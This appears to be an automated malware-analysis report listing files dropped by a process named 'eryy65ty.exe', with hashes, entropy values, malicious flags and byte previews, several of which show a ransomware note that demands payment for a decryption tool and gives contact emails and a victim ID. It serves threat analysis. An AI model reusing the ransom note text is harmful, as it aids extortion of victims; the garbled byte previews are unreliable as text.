                                                                                                                                            Preview:}.............Oh..8NO...$.IF..$......Ym.CH?.T...4n.b7X....U.f.SI....1O.ip...|}.|h?.,Z.......o......vD.h.N....s.F,.y...z..D.Tt.7.....lc.]l.=V....OJ...C%...w..V.}\R0.s..Gm...-..,]..Y..`.......y?[.|G....d...m._`...#.......@-2..6...5:.<".=P..i...24.(........*.v..&.7.8..G~...9s.M.\.n.....A.(D.;=.K]..Z.Hd...Y.z._4.<.>........no.......Z8v.=...Z.6....NP....&@S...^...0.c.|...-b3......UN....F./6.........J....9..-.j.............LW.<dJ.......'*.Nb...)..g.f.o>.N6......5..7....r.G.....Me..<.d.?.<...=...B......d..3!)...j.".c...o.B.Y.`..<.#...5...5.Y...e.Q..k)d.&.-G.:E....v._.6e.h.<...XQ.{R...6...b....6lM...L%.yW..?nw..).L[q=!......+|p/%.......5..My..i.i...g.3.....6......i....;@.....g.S..5HVDb.....m...,........z*s....N.\e.k.....1V.M...S."C..S......DM.T...[.(..V......4.:;.N.....h|6......U..!..t..G.8..Mm%.......K.u5iV.M.>.b.ZE...!......).BA........a...Y.6.cq., .]c.-....;Il....O'z...%<..H.&"..Fj..q.n..).IN.D.<........D..)kH.m.8..wM...f.@...G9cCY.<.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.6048485995273318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:J9HSE2Lx5huY8GvqH1ujI1ZjBbpn0Gvyxu4UmdW0wS7CbkkS:zyE215/AVjdbp2BUmcSec
                                                                                                                                            MD5:2522EF7388AB4AFD9C6921FE5223B3D8
                                                                                                                                            SHA1:6211BEFD25AAE16A45FA0E69836887AC53B65834
                                                                                                                                            SHA-256:7613509E59FEF6276F77C1ADECA100E37D4850355B62779AD67EC64D5E6BE8C4
                                                                                                                                            SHA-512:16DAB4EFE4C1F954CCB8B03B7E8D146440530ECD47DA0B655F087E12DD4F14ECCF5DBEE89912A76956165BCD775970A8C713461A4F07CCC4F0C0064FA817701A
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:wG....Ke.z.7...m.z..h ......E...1.u.ZQ...@.A*.}.....w.j..V2[}Z.'7.Q...:.?_.)...}\[s.^....%..O...<&..hs..+>#i..%..8.sL.....V.6..R.v..I..:Q.hA3...~.(&..,9..5[.".s..*.+..;B......D//O<u..v.dx.....U...vl......d?`... ........Q....P.E....$b$eF....m.RUr......j.........H.82.......x...34o.p..%.AZ.%T..Cn....../=......g....+N..%b......% X....F.]/i...b...88x..o.&[.k.O.0.#A....3I....=..S/......<..cJx..t.}@.....a.g3[@._e..... ..J...:`..P.V&.P.....L>H....U....:.P...zYG....(.D.@..bW..<.2.c._..}.....!.....K!5.]g.v....y..cp..%}te...B.....Vy..>...U.U.od.#.?.^^0.;....x.!&h^.....8..P.....Ir.....m..`.I..(w.p..yK.AQ.8e..qy.l...&.e..+....$.M.<...b.E..4/... \v.....\..E..Ni.a!...XS.W..%(.[D....A.H.zV....D.\."-.K#.V6.a.`.6~...`.....e.+..?bh.s7.....2m].>yU.2..-..1..S.a.lF......#.... ....Fxj..p.B.9..-)vW/l.F.....~5<..9.S.n+....V..h.kD:.~6c..%|)...'.5[....o.s^.Z8....>.8$6>.....|.C...:.&i....Q..E.f.w...e.{'.#<u.s.8.!.1...M...t........,.xN.:Z@P^gwB*...........Q...G.\=XD`g.L{....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.6048485995273318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:J9HSE2Lx5huY8GvqH1ujI1ZjBbpn0Gvyxu4UmdW0wS7CbkkS:zyE215/AVjdbp2BUmcSec
                                                                                                                                            MD5:2522EF7388AB4AFD9C6921FE5223B3D8
                                                                                                                                            SHA1:6211BEFD25AAE16A45FA0E69836887AC53B65834
                                                                                                                                            SHA-256:7613509E59FEF6276F77C1ADECA100E37D4850355B62779AD67EC64D5E6BE8C4
                                                                                                                                            SHA-512:16DAB4EFE4C1F954CCB8B03B7E8D146440530ECD47DA0B655F087E12DD4F14ECCF5DBEE89912A76956165BCD775970A8C713461A4F07CCC4F0C0064FA817701A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:wG....Ke.z.7...m.z..h ......E...1.u.ZQ...@.A*.}.....w.j..V2[}Z.'7.Q...:.?_.)...}\[s.^....%..O...<&..hs..+>#i..%..8.sL.....V.6..R.v..I..:Q.hA3...~.(&..,9..5[.".s..*.+..;B......D//O<u..v.dx.....U...vl......d?`... ........Q....P.E....$b$eF....m.RUr......j.........H.82.......x...34o.p..%.AZ.%T..Cn....../=......g....+N..%b......% X....F.]/i...b...88x..o.&[.k.O.0.#A....3I....=..S/......<..cJx..t.}@.....a.g3[@._e..... ..J...:`..P.V&.P.....L>H....U....:.P...zYG....(.D.@..bW..<.2.c._..}.....!.....K!5.]g.v....y..cp..%}te...B.....Vy..>...U.U.od.#.?.^^0.;....x.!&h^.....8..P.....Ir.....m..`.I..(w.p..yK.AQ.8e..qy.l...&.e..+....$.M.<...b.E..4/... \v.....\..E..Ni.a!...XS.W..%(.[D....A.H.zV....D.\."-.K#.V6.a.`.6~...`.....e.+..?bh.s7.....2m].>yU.2..-..1..S.a.lF......#.... ....Fxj..p.B.9..-)vW/l.F.....~5<..9.S.n+....V..h.kD:.~6c..%|)...'.5[....o.s^.Z8....>.8$6>.....|.C...:.&i....Q..E.f.w...e.{'.#<u.s.8.!.1...M...t........,.xN.:Z@P^gwB*...........Q...G.\=XD`g.L{....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.1176604544474715
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:iy3ctagvfznvAF7WG5Hu4F/oLVqEo3ZYxhtgW57xozv29lpERAVmn:ZuRfzYBWG57Fmqn3ZYX51629lq6mn
                                                                                                                                            MD5:6A40E57571AC517A22991F087E9E9CFD
                                                                                                                                            SHA1:D4C4D2990FD8840B3B92931E364BF28A13924952
                                                                                                                                            SHA-256:4388595D5A0ED8D5DCB43ECC8EBCE21DA8C2C5EA1D80CF46178A19E2F5AAFD62
                                                                                                                                            SHA-512:D8BCAA022838D5649D53CC98F1164AE5BFEA412531CE19B2C45E5D99774ABC609492FB1A0DBC908DCBD0C6C48DD7A0663F92ACC4AF30B7F6F074DFFF8F621B05
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:...Q>~v........B............<.b.|..h.....q...Ldy.Csq..GP.h.]......s.\........^.I.>.;.+NrU~.K.9`.T......X...'......nA..k......h...$....l..o.O.C'..........d.Av.... Tf.#.M...'..DpG...R..s...,......b..F....u.\.B+J..I....5..h..:7.}..'......;'.}....Y.N#tDC.=..%J.......p...xT\0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):98570
                                                                                                                                            Entropy (8bit):0.6458463883440994
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:xbpUa6MRtRqRjQyCQ/lflu9Q0p393Vp5bi0ww7V8snV1:xFUBMRCR8yCiNix3dbFT
                                                                                                                                            MD5:8D7A536BBF8C418A6DB4A07717787724
                                                                                                                                            SHA1:27C57ED818BB2C53827185E267BC0D21546A0CC6
                                                                                                                                            SHA-256:27A69FA632DF15BEF9F3B5C60B45AF7131D6028082E45BABC75ECA6229AF12C4
                                                                                                                                            SHA-512:BC1B4286FA4E4DB47099836068CCF4A60B3AF38FE5A7381ABF93FD06667CEAB40700C3E593571F706919EA1532FAB24E63EECD27D2A7BAE34A666E34330821BF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:}.............Oh..8NO...$.IF..$......Ym.CH?.T...4n.b7X....U.f.SI....1O.ip...|}.|h?.,Z.......o......vD.h.N....s.F,.y...z..D.Tt.7.....lc.]l.=V....OJ...C%...w..V.}\R0.s..Gm...-..,]..Y..`.......y?[.|G....d...m._`...#.......@-2..6...5:.<".=P..i...24.(........*.v..&.7.8..G~...9s.M.\.n.....A.(D.;=.K]..Z.Hd...Y.z._4.<.>........no.......Z8v.=...Z.6....NP....&@S...^...0.c.|...-b3......UN....F./6.........J....9..-.j.............LW.<dJ.......'*.Nb...)..g.f.o>.N6......5..7....r.G.....Me..<.d.?.<...=...B......d..3!)...j.".c...o.B.Y.`..<.#...5...5.Y...e.Q..k)d.&.-G.:E....v._.6e.h.<...XQ.{R...6...b....6lM...L%.yW..?nw..).L[q=!......+|p/%.......5..My..i.i...g.3.....6......i....;@.....g.S..5HVDb.....m...,........z*s....N.\e.k.....1V.M...S."C..S......DM.T...[.(..V......4.:;.N.....h|6......U..!..t..G.8..Mm%.......K.u5iV.M.>.b.ZE...!......).BA........a...Y.6.cq., .]c.-....;Il....O'z...%<..H.&"..Fj..q.n..).IN.D.<........D..)kH.m.8..wM...f.@...G9cCY.<.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.166720139239572
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:94ue1JIez3DqeSCcsWmxV4ytfzrXtSqM7HuZHKzu1Z/LkeZtBbThGWXwkXmmn:9jkZzSCrWQV4ytfzrXsqgm1ZTkeZjYWR
                                                                                                                                            MD5:45F5AAB086D5CB141FEE99B8760CD802
                                                                                                                                            SHA1:A502B7EFD28512D0580DE19AA52F3F87E2219C12
                                                                                                                                            SHA-256:4E5004717C821AD743DDAF5E4BDEE4C70ADA939D9A367EDD964CD3AB0E28044F
                                                                                                                                            SHA-512:7D42EA6D740EC2E0ECEF4BAB53E3B44ABE244FEB3565C0C2E6A9F2C0FC49BE53B63C63350F6455D80346CF46298DF7CA831EA007E1217F52D0D4CE7EC9C79F31
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:Y..#....O...............!."\..,4..d5@....o...........`......~v....I.... ......+9J.?...:.a.+. o.I.$.MD...H'...T.......z].....o.T.@.8.0.i.2.7.?..K.4V..Y..l..."%bs..<9...!F..Ke.A.+...........K..l.Ou_......_.5.....}.....g...G.\X...........q!k.2..[.y.[....Oz.uq.eZ..8..=.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):313
                                                                                                                                            Entropy (8bit):7.333033824756845
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:ohiTmBSeRiN/l8AoYjVVjEG8EX1AyMc9kF7A740I6jr9pegP8ML5yQcn:QiKYkOaEX1GmkJKjI6jZpP8q5kn
                                                                                                                                            MD5:72F825AD0208F43F9920E254FBA60BB7
                                                                                                                                            SHA1:BABFA2ACDBDA52E02D577F2E94A01E6F4B681CF7
                                                                                                                                            SHA-256:0DC3DB0CAE5CC5CA755A328E066B13AD9A153C4DACA1028884B718B7D459C594
                                                                                                                                            SHA-512:15A4401789BDDB78DC87F8FCE282207AF00605882D5773C1BAB6F8EDC9F75B48A0F37730743566C0021D17EFEE1F8C8154D4BFD441DFE9F91037929E6C2C5F97
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..O.....e.;.J8..m8M6eG.<..H.Z...stUse": null.}.i....?..r.%.Z-...m%..t..2.p.x....x5jDX8.D.9X|.0...l7.o..6..5..K.C).6!.q..*_;g...H.B..|\B.>....o.....?.W,.}.....=qu.....Q.."..W.AkX>.... ....N.TF...k.p.....ag.............M`>..M...'.O.....#6...I..Xy(>Qv...9....c.D.j.bm ...w:9...9t....=}...S..9.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):313
                                                                                                                                            Entropy (8bit):7.333033824756845
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:ohiTmBSeRiN/l8AoYjVVjEG8EX1AyMc9kF7A740I6jr9pegP8ML5yQcn:QiKYkOaEX1GmkJKjI6jZpP8q5kn
                                                                                                                                            MD5:72F825AD0208F43F9920E254FBA60BB7
                                                                                                                                            SHA1:BABFA2ACDBDA52E02D577F2E94A01E6F4B681CF7
                                                                                                                                            SHA-256:0DC3DB0CAE5CC5CA755A328E066B13AD9A153C4DACA1028884B718B7D459C594
                                                                                                                                            SHA-512:15A4401789BDDB78DC87F8FCE282207AF00605882D5773C1BAB6F8EDC9F75B48A0F37730743566C0021D17EFEE1F8C8154D4BFD441DFE9F91037929E6C2C5F97
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..O.....e.;.J8..m8M6eG.<..H.Z...stUse": null.}.i....?..r.%.Z-...m%..t..2.p.x....x5jDX8.D.9X|.0...l7.o..6..5..K.C).6!.q..*_;g...H.B..|\B.>....o.....?.W,.}.....=qu.....Q.."..W.AkX>.... ....N.TF...k.p.....ag.............M`>..M...'.O.....#6...I..Xy(>Qv...9....c.D.j.bm ...w:9...9t....=}...S..9.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):341
                                                                                                                                            Entropy (8bit):7.4180227148388935
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:Ni+BIuWML6qfK+BpimyqY4labJpbW37YrzLndIhXdfyhynmTEhqPZbKBCNn:NpFWMLFfBPi94labrbuqzYfyhymS0bM8
                                                                                                                                            MD5:E2E4CC1798F5A315F3F351CF26670730
                                                                                                                                            SHA1:59A96AE309D82798AD3F1FC64783B13BB6BEFF32
                                                                                                                                            SHA-256:C780944857A58BF4FE3BC71A76C5843C090822C41A47CB344A697790729FD95D
                                                                                                                                            SHA-512:64EE7DB6E6C055C7558129C6F951FD3E4C990DEF3BEFC1480B29378113C6950A9F3FC797A3675419CFC59909BDF19740222126C72814A2ED9B5F2AB7328B903E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:$l-........|$.p..'-p}M...../......sj..'+......;u..B.F.=.L.socked=1....GF&.5...7,y.-.C.V.`..v..C....Z.4J.Q.{.....l..@O..I;......fhx.J7Ih......bmD%.Lh'=..^..7?...mP..t..w.`..NtO........m.n....f.....A..b...)...`.....;|K............k.0..UR2....o~....0u....H.....A.....;.-...H.}.~.r..}.&.[_.}.[.Kb.....~o.q*.^..Y.cX.{0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):341
                                                                                                                                            Entropy (8bit):7.4180227148388935
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:Ni+BIuWML6qfK+BpimyqY4labJpbW37YrzLndIhXdfyhynmTEhqPZbKBCNn:NpFWMLFfBPi94labrbuqzYfyhymS0bM8
                                                                                                                                            MD5:E2E4CC1798F5A315F3F351CF26670730
                                                                                                                                            SHA1:59A96AE309D82798AD3F1FC64783B13BB6BEFF32
                                                                                                                                            SHA-256:C780944857A58BF4FE3BC71A76C5843C090822C41A47CB344A697790729FD95D
                                                                                                                                            SHA-512:64EE7DB6E6C055C7558129C6F951FD3E4C990DEF3BEFC1480B29378113C6950A9F3FC797A3675419CFC59909BDF19740222126C72814A2ED9B5F2AB7328B903E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:$l-........|$.p..'-p}M...../......sj..'+......;u..B.F.=.L.socked=1....GF&.5...7,y.-.C.V.`..v..C....Z.4J.Q.{.....l..@O..I;......fhx.J7Ih......bmD%.Lh'=..^..7?...mP..t..w.`..NtO........m.n....f.....A..b...)...`.....;|K............k.0..UR2....o~....0u....H.....A.....;.-...H.}.~.r..}.&.[_.}.[.Kb.....~o.q*.^..Y.cX.{0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):571
                                                                                                                                            Entropy (8bit):7.685871947787924
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:BnA0htTfUIRF6tbydmyhKlYj/E3h4My8/gjctOBhc44sxBZn:BnA0hJ/ObydFhKg/m4My8YjctOQ41xBZ
                                                                                                                                            MD5:434E4263BAF07DEE8D5317AEE733B0CE
                                                                                                                                            SHA1:FA44E52660D762E49BD91169B232DF1AB6960ACC
                                                                                                                                            SHA-256:316A664B2D7FE1B2CE44490D3754708303218987103D157736680C4291D59900
                                                                                                                                            SHA-512:2FF6AAED081B1911947B280257BBBB1C82F7AD9096C36054059376FD4A33A94D8F263C15445EB954DE4129C910588BE4144E898177C1E0211E312A35368FC421
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.M@Z.C.g.w....:r..D*.')....rT...X.HX.e%...V.$.7uo..hc....M.po.v_...9..,.W..5..*6i.*.......K-.... ..]b..g..-.Y...#.56..k.T....{......J..N.I.:.c.I.3.}D.o...!....n.{d.1..F........x.Lh..".`M7......f?..t~~.hI...p.kp.....eW2=_.......'9.E....-.....]./..4.d..H.hH..F.tX..#..?...."w.@.0b0.>}..%qp.b'.d..G'..._a.Gl..4.......K&.'..\...w..H..f....V...}.`."..".9b.......o.7>.S.i.M.G........1C...^..f..1.....\.g...........%.i.'..Z.F....B....A.T...../.X7E ...^Q.^.........n.....z.G.....{.b....Z.=L).v..|...F.Q.q.g&L:F6.......:.s....;.lm..Ob./..0....0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):571
                                                                                                                                            Entropy (8bit):7.685871947787924
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:BnA0htTfUIRF6tbydmyhKlYj/E3h4My8/gjctOBhc44sxBZn:BnA0hJ/ObydFhKg/m4My8YjctOQ41xBZ
                                                                                                                                            MD5:434E4263BAF07DEE8D5317AEE733B0CE
                                                                                                                                            SHA1:FA44E52660D762E49BD91169B232DF1AB6960ACC
                                                                                                                                            SHA-256:316A664B2D7FE1B2CE44490D3754708303218987103D157736680C4291D59900
                                                                                                                                            SHA-512:2FF6AAED081B1911947B280257BBBB1C82F7AD9096C36054059376FD4A33A94D8F263C15445EB954DE4129C910588BE4144E898177C1E0211E312A35368FC421
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.M@Z.C.g.w....:r..D*.')....rT...X.HX.e%...V.$.7uo..hc....M.po.v_...9..,.W..5..*6i.*.......K-.... ..]b..g..-.Y...#.56..k.T....{......J..N.I.:.c.I.3.}D.o...!....n.{d.1..F........x.Lh..".`M7......f?..t~~.hI...p.kp.....eW2=_.......'9.E....-.....]./..4.d..H.hH..F.tX..#..?...."w.@.0b0.>}..%qp.b'.d..G'..._a.Gl..4.......K&.'..\...w..H..f....V...}.`."..".9b.......o.7>.S.i.M.G........1C...^..f..1.....\.g...........%.i.'..Z.F....B....A.T...../.X7E ...^Q.^.........n.....z.G.....{.b....Z.=L).v..|...F.Q.q.g&L:F6.......:.s....;.lm..Ob./..0....0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.124237237481813
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:hXMb2YhDPBd+Bfj7ywwY1NZ/6wxLbzZhTqIkpZj/Ngt5xldmPCsUyn:hXMDTKfXHTPzZJqIkbjhkyn
                                                                                                                                            MD5:189515160B4D5169D68F2357D401785A
                                                                                                                                            SHA1:12DBAF705B0F02590C10D4787B8CAE80E35B2E42
                                                                                                                                            SHA-256:CDBF61E97CAAB14719CA69114E737984896EA7BE3EAA217CDFA16C735797F110
                                                                                                                                            SHA-512:C990E4A7E09F7DF4D5B826D5509D7B4C396167C4613A03A1EADE2747A21A0A6E1502CA5E11391DAA011A1391ED49E4B1CC3384D7DACA74A12E82EF4A730D3E4D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;p.r...................?u..<.....3a*...6..$[...9..8.....Y.D.....q.....`.R/`.A..k..>.-<c...."D.."j..`.a.+.`..c>1..Q.=n1.9V.9.........e*........2-..%.Of..S.O.9.j.j.7...,.?v....A...r.....6.+|b.&e.!....w.c..3.....1.M!..Tx....4..S=.o.t.ez|..)+.C..0.?.W....E...d=.j...;?.-[0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
